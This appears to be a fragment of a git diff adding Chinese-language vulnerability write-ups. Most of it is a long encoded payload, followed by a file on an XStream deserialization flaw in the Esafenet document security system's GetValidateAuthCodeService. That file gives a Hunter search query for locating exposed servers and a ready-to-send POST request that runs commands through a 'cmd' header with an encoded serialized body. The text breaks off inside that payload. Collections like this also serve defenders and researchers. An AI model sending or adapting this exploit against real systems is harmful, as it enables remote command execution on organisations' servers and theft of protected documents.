AOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706605714878-687649e1-4cfd-4982-8c7e-ab43850d8c8a.png](./img/w4Hx6BvqW5VzinnP/1706605714878-687649e1-4cfd-4982-8c7e-ab43850d8c8a-926037.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gxvve0cgqllw7pqe>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..367ba24
--- /dev/null
+++ b/亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/EYAPtwuYcTJTY55y/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-018207.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/GetValidateAuthCodeService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBO